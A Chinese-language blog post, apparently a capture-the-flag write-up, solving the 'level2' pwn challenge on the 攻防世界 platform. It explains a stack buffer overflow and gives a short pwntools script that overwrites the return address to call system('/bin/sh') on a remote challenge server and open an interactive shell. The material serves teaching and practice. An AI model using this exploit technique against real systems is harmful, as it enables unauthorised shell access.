avatar

Pwn弟弟的成长日记(三)--攻防世界level2

解题思路

  1. 查看文件信息,安全机制
  2. 代码审计
  3. 分析漏洞点
  4. 编写EXP

查看文件信息,安全机制

代码审计

分析漏洞点

很常规的溢出我们来构造payload
没有直接system(binsh)的函数
但是字符串中有/bin/sh 程序中也有system函数
我们要把/bin/sh作为参数给system
payload=offset*”a”+p32(system_addr)+p32(0x00000000)+p32(binsh_addr)

编写exp

1
2
3
4
5
6
7
8
from pwn import *
p=remote("111.198.29.45",58329)
p.recv()
system_addr=0x08048320
offset=0x88+0x4
payload=offset*"a"+p32(system_addr)+p32(0x00000000)+p32(0x0804a025)
p.sendline(payload)
p.interactive()
文章作者: Sunset
文章链接: https://pwnedyu.cn/2020/04/05/Pwn%E5%BC%9F%E5%BC%9F%E7%9A%84%E6%88%90%E9%95%BF%E6%97%A5%E8%AE%B0%EF%BC%88%E4%B8%89%EF%BC%89--%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8Clevel2/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Sunset's blog
打赏
  • 微信
    微信
  • 支付寶
    支付寶